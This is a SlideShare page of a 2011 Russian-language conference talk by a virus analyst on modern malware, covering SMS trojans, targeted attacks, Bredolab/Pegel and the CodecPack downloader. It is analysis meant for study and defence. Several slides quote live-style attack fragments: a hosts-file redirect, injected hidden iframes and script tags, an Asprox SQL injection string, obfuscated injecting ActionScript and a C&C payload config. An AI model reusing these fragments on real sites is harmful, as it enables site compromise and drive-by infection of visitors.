CSEDays. Алексей Кадиев

944 views
867 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
944
On SlideShare
0
From Embeds
0
Number of Embeds
153
Actions
Shares
0
Downloads
9
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

CSEDays. Алексей Кадиев

  1. 1. Современные компьютерные угрозы<br />Алексей Кадиев<br />Вирусный аналитик<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  2. 2. Жизнь онлайн<br />Екатеринбург, 14-17 апреля, 2011<br />CSEDays. Theory 2011<br />Все онлайн :<br /><ul><li>Государства (онлайн-голосование…)
  3. 3. Компании и сервисы (онлайн-банкинг…)
  4. 4. Развлечения (онлайн-игры…)
  5. 5. Знания (Google, Wiki…)
  6. 6. Общение (Одноклассники, ВКонтакте…)
  7. 7. И личная жизнь тоже (Skype, SMS, интернет-пейджеры)</li></ul>Все онлайн … Что еще?...<br />
  8. 8. Цифровой мир под угрозой<br />“АВ” Индустрия<br />Устройства, операционные системы, приложения и сервисы<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  9. 9. Источники киберугроз<br />Цель: каждый человек в Сети<br /><ul><li>Киберпреступники
  10. 10. Хактивисты
  11. 11. Кое-кто еще похуже</li></ul>Каждая <br />компаниямишень для атаки<br />Все страны и мировая экономика под ударом<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  12. 12. Что хотят злоумышленники?<br /><ul><li>Ваши личные данные
  13. 13. Исходные коды продуктов
  14. 14. Данные третьих лиц, хранящиеся на компьютере жертвы
  15. 15. Почтовая переписка сотрудников компаний
  16. 16. Информация о клиентах
  17. 17. Исследование интранет сети для сбора конфиденциальных данных
  18. 18. Ваши деньги</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  19. 19. Откуда деньги?<br />Воровство и вымогательство<br /><ul><li>Кражи непосредственно у пользователя
  20. 20. Онлайн-банкинг, электронные платежные системы, номера кредиток…</li></ul>А если у меня нет денег?<br /><ul><li>Доступ к вашим ресурсам
  21. 21. Создание ботнетов, рассылка спама, проведение DDoS-атак, партнерские сети, предоставление вычислительных мощностей, сбор паролей, незаконное открытие веб-страниц…</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  22. 22. Главные причины онлайн-преступности<br />Это прибыльно<br /><ul><li>Жора
  23. 23. Автор Backdoor.Win32.Bredolab
  24. 24. Организатор DDoSна KL
  25. 25. До $100 0000 в месяц</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  26. 26. Главные причины онлайн-преступности<br />Это прибыльно<br /><ul><li>SMS-блокеры</li></ul>В конце августа в Москве было арестовано несколько человек, обвиняемых в создании SMS-блокеров. По данным МВД РФ, доход, полученный этой группой незаконным путем, оценивается в 500 млн. рублей<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  27. 27. Главные причины онлайн-преступности<br />Это легко выполнимо<br />Простота (с технической и моральной точки зрения)<br /><ul><li>Отсутствие реального контакта с жертвой
  28. 28. Главное орудие преступника – ПО и интернет
  29. 29. Операционные системы не безопасны</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  30. 30. Главные причины онлайн-преступности<br />Это бизнес с минимальным риском<br /><ul><li>Профессиональные преступники анонимны и работают на международном уровне
  31. 31. Международной киберполиции не существует
  32. 32. Серьёзные пробелы в законодательстве
  33. 33. Жертвы редко сообщают в правоохранительные органы о преступлении</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  34. 34. Цифровые угрозы<br />Целенаправленные атаки<br />SMS-блокеры<br />Заражение легальных сайтов<br />Ботнеты<br />Руткиты<br />СПАМ<br />WEB2.0<br />drive-by downloads<br />Буткиты<br />Цифровые угрозы<br />DDOS<br />Уязвимости<br />Социальная инженерия<br />Rogue AV<br />Эксплойты<br />Фишинг<br />Кража личных данных<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  35. 35. Актуальные угрозы<br />
  36. 36. Число сигнатур<br />Лаборатория Касперского обрабатывает в среднем 35,000 зловредных и потенциально-нежелательных программ каждый день. <br /> Общее число сигнатур на 15 марта 2011: 5,090,353<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  37. 37. Основные события 2010 года<br />5 инцидентов<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  38. 38. История №1<br />Новая корпоративная угроза<br />“Операция Aurora”<br />MS10-002 - Critical<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  39. 39. История №2<br />Революционное вредоносное ПО<br />Stuxnetbotnet<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  40. 40. История №3<br />Угроза безопасности<br />Это старая, но актуальная проблема<br />BootVirus+x64 Rootkit<br />64<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  41. 41. История №4<br />Троянцы-вымогатели<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  42. 42. История №5<br />Аресты преступников и закрытия ботнетов<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  43. 43. Мобильные угрозы<br />
  44. 44. Эволюция мобильных угроз<br />2004-2006: Первые эпидемии (Bluetooth и MMS черви)<br /><ul><li>Worm.SymbOS.Cabir, Worm.SymbOS.Comwar, Virus.WinCE.Duts</li></ul>2006-2007: Новые типы угроз (различные трояны)<br /><ul><li>Trojan.SymbOS.Skuller, Trojan-Spy.SymbOS.Flexispy</li></ul>2008-2010: Коммерциализация (SMS троянцы, программы-шпионы)<br /><ul><li>Trojan-SMS.SymbOS.Lopsoy, Trojan-SMS.AndroidOS.FakePlayer, Trojan.WinCE.Terdial…</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  45. 45. Статистика<br />Число сигнатур<br />Общее число сигнатур на 15марта 2011 года: 2177<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  46. 46. Статистика<br />Распределение по платформам<br />Число семейств мобильных угроз: 175<br />Число модификаций мобильных угроз: 1275<br />Число вредоносных программ для мобильных устройств, найденных в феврале 2011: 75 новых модификаций<br />Самая распространенная мобильная угроза: SMS троянцы<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  47. 47. Пример (примитивный): Trojan-SMS.J2ME.Konov<br /> Один из первых распространенных SMS троянцев<br /> Маленький размер файла (1.5 – 6 kB)<br /> Без шифрования<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  48. 48. Konovи Vkontakte<br />Спам в социальных сетях<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  49. 49. Пример (продвинутый): Trojan-SMS.J2ME.VScreener<br />Фальшивый видео проигрыватель<br />Должен быть «настроен» самим пользователем<br /> SMS посылаются во время «настройки»<br />Зашифрованный премиум номер и текст SMS хранятся в файле «load.bin»<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  50. 50. Пример (примитивный): Троян для Android<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  51. 51. Троян для Android<br />Маскируется под проигрыватель порнографических роликов<br />Веб-сайты используют технику поисковой оптимизации (SEO)<br />Посылает SMS на платные номера без ведома пользователя<br />$6 or $10 per SMS<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  52. 52. Зловреды на Android Market <br />Более 50 вредоносных приложений на Android Market<br />Инфецированные версии легальных приложений<br />Root-доступ к ОС (уязвимыми были версии < Android 2.3)<br />IMEI и IMSI-коды<br />Информация об ОС и типах устройств<br />Загрузка и установка приложений <br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  53. 53. Пример (сложный): Trojan-SMS.SymbOS.Lopsoy<br />Подписанный SMS троянец для устройств на базе Symbian S60 3d edition<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  54. 54. Как Lopsoy получает информацию об SMS<br /><ul><li>Соединяется с URL автора
  55. 55. Получает текст SMS и премиум номер</li></ul>http://lou***.ws/devicecontrol.php<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  56. 56. Как Lopsoy распространяется<br />Различные веб-сайты с ‘играми для смартфонов’<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  57. 57. Net-Worm.IphoneOS.Ike.b: перенаправление URL<br /><ul><li>Net-Worm.IphoneOS.Ike.b – первая «коммерческая» зловредная программа для iPhone
  58. 58. Использует SSH «уязвимость»на jailbreak-телефонах (также как Ike.a)</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  59. 59. Net-Worm.IphoneOS.Ike.b: перенаправление URL<br /><ul><li>Изменяет пароль SSH по умолчанию
  60. 60. Получает команды от сервера
  61. 61. Перенаправляет клиентов голландского банка на фишинговую страницу</li></ul>#!/bin/sh<br />echo "210.*.*.* mijn.ing.nl" >> /etc/hosts<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  62. 62. Мобильные угрозы: резюме<br /><ul><li>Вредоносные программы для мобильных устройств нацелены на различные платформы
  63. 63. Наиболее популярны методы социальной инженерии
  64. 64. Киберпреступники не наказаны</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  65. 65. Таргетированные атаки<br />
  66. 66. Таргетированные атаки vs. классическое вредоносное ПО<br />Снайперская винтовка против пулемета<br /><ul><li>Не носят характер эпидемии
  67. 67. Достаточно одного емейла вместо десятков тысяч
  68. 68. Незаметны
  69. 69. Атакуемые организации либо не в курсе, либо не разглашают информацию об инцидентах
  70. 70. Трудно достать сэмпл для анализа
  71. 71. Сигнатурные методы детекта бесполезны
  72. 72. Новые технологии защиты
  73. 73. Гораздо большие ставки
  74. 74. Воровство интеллектуальной </li></ul>собственности, промышленный<br />шпионаж, саботаж<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  75. 75. Таргетированные атаки за 4 шага<br />Сбор данных о сотрудниках<br /><ul><li>Выбор подходящих жертв
  76. 76. Сбор данных через социальные </li></ul>сети, почтовые переписки, <br />публичные выступления и т.д.<br /><ul><li>Языковой барьер
  77. 77. Злоумышленникам удобнее общаться </li></ul>на родном языке<br /><ul><li>Язык может указать на происхождение атаки</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  78. 78. Персональная информация публична<br /><ul><li>Социальные сети предоставляют большое количество персональной информации
  79. 79. Рекламодатели этим уже пользуются:таргетированная реклама
  80. 80. Возраст, пол, местонахождение, интересы, область деятельности, привычки, отношенияи т.д.</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  81. 81. Таргетированные атаки за 4 шага<br />Разработка своего <br />вредоносного ПО для <br />осуществления атаки<br /><ul><li>Нет цели обойти любой </li></ul>антивирус<br /><ul><li>Использование методов социальной инженерии для того, чтобы жертва кликнула по ссылке
  82. 82. Сбор информации об установленной ОС, браузере, плагинах помогает в экслуатации уязвимостей
  83. 83. Корпоративная монокультура приводит к проблемам
  84. 84. Все сотрудники используют одинаковое ПО</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  85. 85. Таргетированные атаки за 4 шага<br />Получение доступа<br /><ul><li>Эксплойт загружает и устанавливает вредоносную программу на машину жертвы
  86. 86. Сети защищены как правило от внешних угроз
  87. 87. Связь с управляющими серверами осуществляется посредствомTLS или TLS-подобных протоколов
  88. 88. Шифрование – полка о двух концах
  89. 89. Сетевой трафик нельзя проанализировать</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  90. 90. Таргетированные атаки за 4 шага<br />Вынос всего ценного<br /><ul><li>Поиск сервера компании, </li></ul>расположенного максимально близко <br />от злоумышленников, который будет <br />использоваться как <br />«перевалочный пункт», <br /><ul><li>Скорость – ключевой фактор
  91. 91. Копирование данных через </li></ul>корпоративную сеть на этот сервер<br /><ul><li>Копирование всех собранных данных на сервер, контролируемый злоумышленниками
  92. 92. Если трафик мониторится, то все равно может быть слишком поздно</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  93. 93. Bredolab<br />
  94. 94. Жора<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  95. 95. PegelиGumblar<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  96. 96. Что такое Pegel<br /><ul><li>Pegel– вредоносный JavaScript код, встраеваемый в веб-страницы на взломанных веб-серверах
  97. 97. Появился в самом конце 2009 года
  98. 98. Это начальная стадия формирования ботнета
  99. 99. Поведение похоже наGumblar</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  100. 100. Что делаетPegel<br /><ul><li>Единственная задача этого JavaScript кода – вставка тэга IFRAME, приводящего пользователя на страницу с эксплойтами
  101. 101. Множество зараженных веб-страниц, содержащих этот тэг</li></ul><div id=“G88tljvky52tn”><br /><iframesrc=http://ma***gh.com:8080/index.php?Mvplkcm435j=11&pid=1<br />width=“1” frameborder=“0” height=“1”></frame><br /></div><br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  102. 102. Количество детектирований Pegel<br />Источник: Лаборатория Касперского<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  103. 103. Pegelв спаме: Июнь 2010<br />Источник: Лаборатория Касперского<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  104. 104. Сеть доставки эксплойтов<br /><ul><li>Порт 8080:</li></ul>http://domain.com:8080/optional_path <br /><ul><li>“nginx”, популярный веб-сервер, который часто используется в качестве обратно прокси сервера
  105. 105. Каждый домену соответствовали 5 IP адресов
  106. 106. Набор IP адресов постоянно менялся
  107. 107. Легальный контент на 80 порту
  108. 108. Похоже на fast-flux сеть зараженных веб-серверов</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  109. 109. Эксплойты<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  110. 110. Bredolab<br /><ul><li>В случае успешной работы эксплойта, на компьютер жертвы устанавливается Bredolab
  111. 111. Использует руткит-технологии
  112. 112. ЗадачаBredolab– загрузка с управляющего сервера и запуск других вредоносных программ
  113. 113. 3 типа вредоносных программ, которые загружал Bredolab:
  114. 114. Коммерческое вредоносное ПО (партнерки)
  115. 115. SPAM боты
  116. 116. Троянец, ворующий пароли к Ftp</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  117. 117. Загрузки<br /><ul><li>Bredolabзагружал разнообразное вредоносное ПО:
  118. 118. Trojan-Spy.Win32.Zbot
  119. 119. Trojan-Spy.Win32.SpyEyes
  120. 120. Trojan-Spy.Win32.BZub
  121. 121. Backdoor.Win32.HareBot
  122. 122. Backdoor.Win32.Blakken
  123. 123. Backdoor.Win32.Shiz
  124. 124. Trojan-Dropper.Win32.TDSS
  125. 125. Trojan-Ransom.Win32.PinkBlocker
  126. 126. Trojan.Win32.Jorik.Oficla
  127. 127. Некоторые из установленных Bredolabпрограмм отправляли на свои C&Cid партнера
  128. 128. Id партнера обычно используется в партнерках</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  129. 129. PSW Stealer<br />Trojan-PSW.Win32.Agent.qgg<br />Функционал:<br /><ul><li>Кража локально хранящихся учетных данных ftp от веб-сайтов
  130. 130. Отправка найденных паролей на Bredolab C&C для заражения веб-сайта
  131. 131. Filezilla 3
  132. 132. Ftp Navigator
  133. 133. BulletProof Ftp
  134. 134. CuteFtp
  135. 135. ALFTP
  136. 136. Far 2
  137. 137. Frigate 3
  138. 138. Ftp Explorer
  139. 139. FlashFXP
  140. 140. FTPRush
  141. 141. Firefox
  142. 142. Auto FTP
  143. 143. Total Commander</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  144. 144. Заражение веб-сайта: Ftp Log<br /><ul><li>Похиченные пароли к FTP используются для заражения веб-сайта
  145. 145. Все файлы index*, default*, main* и *.jsвыкачиваются с сервера, в них встраевается вредоносный код, после чего зараженные файлы загружаются обратно
  146. 146. IP адреса FTP клиентов, забирающих файлы с сервера и загружающих их обратно могут различаться</li></ul>Tag inserted:<br /><script type="text/javascript" src="http://add***ock.ru/GUI.js"></script><br /><!--50202ec634ac83b7f315e3cf13e30037--><br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  147. 147. Формирование ботнета<br />help***ecare.at<br />pass***tblues.ru<br />best***kstar.info<br />…<br />and so on<br />C&C<br />Stolen <br />paswords<br />Redirectors<br />Exploit Delivery Network<br />(compromised servers<br />with nginx on port 8080)<br />index*, <br />default*, <br />main*, <br />*.js<br />User’s web/ftp server<br />user<br />Infected legitimate<br />web site<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  148. 148. Asprox<br />10 000 в день<br />Task: Infect<br />SQL Injection<br />Pegel/Bredolab<br />GET /page.asp?id=425; declare%20@s%20varchar(4000);set%20@s=cast(0x6445634c417245204054207661526368615228323535292c406320...5205461424c655f435552736f7220%20as%20varchar(4000));exec(@s);–<br />Asprox C&C<br />Asprox Bot<br />MS IIS/ASP<br />пользователь<br />http://nem****n.ru/<br />tds/go.php?sid=1<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  149. 149. Уязвимость в OpenX<br />Уязвимость в модуле Flash Chart 2<br />Pegel/Bredolab<br />Фрагмент ActionScriptкода:<br />ExternalInterface.call("new function(){<br />function _a6c6abfc0437ed3d4c2a9d7d9c15d5bf(){<br />var_71b9cfdb2309eb27ee69dda6cae35b2a=document.createElement("script");<br />_71b9cfdb2309eb27ee69dda6cae35b2a.src='http://a***nd.ru/LIFO.js';<br />_71b9cfdb2309eb27ee69dda6cae35b2a.defer=1;<br />document.body.appendChild(_71b9cfdb2309eb27ee69dda6cae35b2a);};<br />try {_a6c6abfc0437ed3d4c2a9d7d9c15d5bf();} <br />catch(e){document.write("<body>");setTimeout(function()<br />{ _a6c6abfc0437ed3d4c2a9d7d9c15d5bf(); }, 500);}; }");<br />Пользователь<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  150. 150. Заражение через Spam<br />Pegel/Bredolab<br />PLEASE WAITING 4 SECOND...<br /> <meta http-equiv="refresh" content="4;url=http://spr***team.com"><br /></head><body><br /><iframesrc="http://yu***eyes.ru:8080/index.php?pid=10" style="visibility: hidden;<br />" height="1" width="1"></iframe><br /></body></html><br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  151. 151. Artro<br />(Trojan-Downloader.Win32.CodecPack)<br />
  152. 152. Загрузчик<br />Trojan-Downloader.Win32.CodecPack (Kaspersky Lab)<br />Упакован приватным криптором<br /><ul><li>цель - сбить детект
  153. 153. полиморфизм
  154. 154. антиэмуляция
  155. 155. вручную снимается достаточно просто
  156. 156. частая перепаковка</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  157. 157. Результаты проверки CodecPackна VirusTotal<br />Результат проверки файла <br />двухдневной давности<br />Удручающий результат проверки «свежего» сампла<br />F A I L !<br />11/43 (25.6%)<br />40/43 (93.0%)<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  158. 158. Под упаковщиком<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  159. 159. Обфускация<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  160. 160. Загрузчик в работе<br /><ul><li>Проверка виртуальной среды и отладчика
  161. 161. Строки зашифрованы (RC4)
  162. 162. Проверяет соединение с интернетом, в случае неудачи завершает свое исполнение
  163. 163. Собирает информацию о зараженном компьютере и отправляет ее на C&C</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  164. 164. Запрос к C&C<br />User-Agent: Mozilla/6.0 (Windows; wget 3.0)<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  165. 165. Запрос к C&C<br />GET-параметр:<br />v22MnmDnHYfxCWI06FcUQOE5OLPvIYg4OtcPHid3L0oHCw7U2UWOm2rzU1rHIQqMgMqVv8JHeAiBMF4QB33zfYiRtufQpKX8MPtpuO7vlA==<br />BASE64 + RC4<br />uid<br />a1=4ded23cdfec1eb7b512840cadb35a169ddfc4eef&<br />a2=00001920&cd=Fri 04 2011,22:16:41<br />Partner id<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  166. 166. Запрос к C&C<br />BASE64 + RC4<br />POST data:<br />qSrTzGL0RMCyDnY9+xJEQe5nNLundsMqfdgBGzUoJ0xVTU/DzQWC3DLbXB/UfETT1o6F2ZIbLEGVJ0MOJTSDP9PX4aSS/OagY6143bGp0y/uGVSLVL0u+us+x5NraqI7DJaKGg7TCqXkTszGInUBxiK1/hKL2oFYpjsSeY04x+zt2a9dO+UI5VhP0W45<br />wvbffv=updpov&admin=yes&wloapl=gcpxsp&os=Microsoft Windows XP Professional Service Pack 2 (build 2600)&qymxsz=mkgflj&debug=none&oeuprp=cbvhox<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  167. 167. Ответ C&C<br />4i7exXC8c4mxHmcg+QoZUPFieuWsasB4N5MJEyNjOltZTkONmkyDiDH+QQjWKRiTxI3M6pIRJgCLOkw1AGagIs7Cq+7Vre2vZ6c8v+a+ln7uRBC6U78gvLoo3sN7YqxrG8beHgvNHe2vEYzQbC5cmybl8xnJj4Ze4D0aL4Nvk6m0juMfLaNRt1wK2jV1LMVonwYDZhQV9TCcLC8K/jaSl2iGyFsFOJqlI+v+lGTo8iCwjl9V63rlQ1wdvDjgc9lvdhMXOK3bWNlwF8mkitR2ZMZ/sJ03lxw1AfJKjiNhuuDR1lVIseLFz7od742Zcy/PifsYkiiD2iSfnyGbl3c2hVH3kXKO3swayP+1QBLrc7kPxNAuYPBjwOexIGzmvVIu7DxjAj1+PumU4TTpwpByVNtEpjkCu4bTqG8SE85NgTJX+/zhzpolGgDVPI2lxx0OLx8MX2dQ9TO7l6GH7q6BOZ5kZAI7100GGEcPLEeIwgY1y9mawLoQVSiHoL//E2MFZMW85b//lKxW6p2tSCwdScWkakghLoknwKdn/CMzvqWMjSFj0dlWqdjypaeOQIdRUp/7fC4jnUI5pimM9vJ+7CM4OP84XsAVCUz9P/WRMVtQaAI4I3WFMtk/KlVTd5d4eyrH48XVCsscUrFuEedu65qcc6i/BmNDHdt/wC/3RSnbD3dG5OjrAjsJSheGQHyBjhNz5koM1oxsqCIAsQVAh9RYl0/D0aJHkDHwGGX+wK0D785mxcU7oH35A1S7U9POcJ3vae3Ive/zdZsQok4QJIFwB4VoCX2Ed4ipL5BtfyoiKRoHMlTn0E5RvpdE+AVYEDE33zE74KNALfcDmFkGh7dqXHgX/BQ4s6NpGNMwT+pE2IEyrDOBtBlN9jnhyR5fcQpJQoSlyaylfY8oHJftstYeWqdAIkMgXxmeBtaSYMG7jewjKHAz1L8N2scPVwcHWa56EL5O0JyD1u9rXO3pMpRe4p4j7FfYwazDXV9TrnKRfGzw14nipxscdYoV8cOVP6WW1XQ2TaGHyKjhFpYbibUiABWH8KDgxbZtYTMgNMq45eFTEYrMY98i7insKDyWS6ecEJqmRjXAwsqPNxX1gI3ZzKR7k5kYIs60gdTV8VbReidhBTPab8hDGMvKbwROhJtSeIyUYqGdltIMlLtbLaNl6Tn9rrg8yjuLAdulravoMF1Tb/uJkYKRwF760SJAaJT5eD+nlGLFed+QpUtZFf32Ww5UxdQQ0bo3efpE6V2dNRQGcc2uDwKpYxLumd9Vf/JaragjDfT89MXC9YG7bb79+cjmsv91Ecy7CyyOD/WISJ0bjHHODo28aRGO7iuYADfRXi8aMmXQklxnElDZ+YGcpf1fd5Dji4cBo4PVIChOR+9K++TVyJFuXdiEUsL9aLUMafmb76ZKTuFuisgiGnOVH8+P1vMM+8ze7w4bBvuEqGtxWmrxFDrgpx5rq0VDr+oT33TbRsJpAOgPmvzlewQDyyV31A+Ux2p9lRjpxURJsbmS+gpTiCgiufQnHf2X1BRZsbIjYlzJaPZRKHRB713LeG+FmwhQlsEFJRQMrTZLaRpj8yzbH6YRmfMjNWu8p5C4Y30qKutNHRBXzFqrASBIjm4=<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  168. 168. Расшифрованный ответ – Конфигурационный файл<br /><root><br /><start><urlcrypt='gif' post='on'>http://tw***dn.in/cursors/948daefd12e38c8dafaefc612eab47bb45719228e4f06c6aad1bd3a58a91c6292d6d1f3c44aebeff4/b6647362a/cursor_upp.gif</url><urlcrypt='gif' post='on'>http://web***ith.in/cursors/24ad2ecdd213bc3d7f6e5c410eebe7cb050122284470cc0a7d1bc3d58a2186b9cdad7f9cb43ede3f9/267493126/cursor_upp.gif</url></start><br /><start><urlcrypt='gif'post='on'>http://shu***edrive.in/werber/562473824/217.gif</url><url crypt='gif' post='on'>http://new***bridge.in/werber/b60413b27/217.gif</url></start><br /><start><urlcrypt='gif' post='on'>http://data***ykey.in/perce/247d5ebd92d36c6d7feefc311ecb67abf5d1420844a02cba2d7b63259a21a6c99dfd7f3cc4ee9e4fc/8674d352d/qwerce.gif</url><url crypt='gif'post='on'>http://filefo****online.in/perce/845dbecd62f37c9dbf9e0c11ceab377b65d162e80430cc9a8d8b23f56a81d6f9dd9dbf3c842ede3fc/d65493829/qwerce.gif</url></start><br /><start><urlcrypt='gif' post='on'>http://tw***dn.in/papers/e46d7ecd62b39c0d4f1e3c318ebb177b95a132d83460ac7a2d8bc3c50a51d6f9cd5dbf3c045e3e5f6/6684f322a/paper.gif</url><url crypt='gif' post='on'>http://web***ith.in/papers/64bd5e9d82830c2d0f3eacc1feab27cb95f122582430ac5a8d1bc3151ae1b6799d0d1f2c941e4e9f4/f66443a29/paper.gif</url></start><br /></root><br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  169. 169. Настоящие gif-картинки<br /><ul><li>В блоке комментариев содержится зашифрованный с помощью RC4 исполняемый файл
  170. 170. Загрузка и запуск всех файлов из конфигурационного файла
  171. 171. Загрузчик удаляет свой исполняемый файл с диска и завершает свое исполнение</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  172. 172. Загрузки<br />рекламные программы/кликеры<br /><ul><li>BannerBot
  173. 173. New_bb
  174. 174. PopupBot
  175. 175. HitBot
  176. 176. Oms</li></ul>Сторонние программы<br /><ul><li>Backdoor.Win32.TDSS.ur</li></ul>боты, показывающие рекламу и совершающие клики по ссылкам, рекламным баннерам и всплывающим окнам.<br /><ul><li>Упакованы тем же криптором
  177. 177. Код очень похож на код загрузчика
  178. 178. Те же методы обфускации
  179. 179. Тот же алгоритм шифрования строк
  180. 180. Протокол общения с сервером идентичен протоколу загрузчика</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  181. 181. Оригинальные названия ботов<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  182. 182. Результат работы adware<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  183. 183. Деньги<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  184. 184. Результат накрутки трафика<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  185. 185. Распространение<br />Разнообразные способы распространения<br /><ul><li>Drive-by-download (эксплойты)
  186. 186. Спам
  187. 187. Ботнеты
  188. 188. Пользователи сами загружают и запускают CodecPack</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  189. 189. Распространение: поддельный видеохостинг<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  190. 190. Распространение: поддельный блог<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  191. 191. Веб-страница с изображением плеера<br /><A href="http://mo***ilite.in/vimeoHDRviewer.40014.exe"><IMG src="xplayer.gif" border=0></A><br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  192. 192. Распространение: варезные сайты<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  193. 193. Статистика<br />Количество пользователей, на компьютерах которых был задетектирован Trojan-Downloader.Win32.CodecPack<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  194. 194. Статистика<br />Количество уникальных IP-адресов в лог-файлах C&C<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  195. 195. Статистика: Распределение по странам<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  196. 196. Что делать?<br /> Не пользоваться Интернет-услугами?<br />Нереально!<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  197. 197. Как снизить риск для пользователя<br /><ul><li>Надежный антивирус с новейшими базами
  198. 198. Своевременное обновление ПО
  199. 199. Виртуализация
  200. 200. Отключение дополнений и Javascriptв веб-браузере и Adobe Reader
  201. 201. Не запускать сомнительные приложения
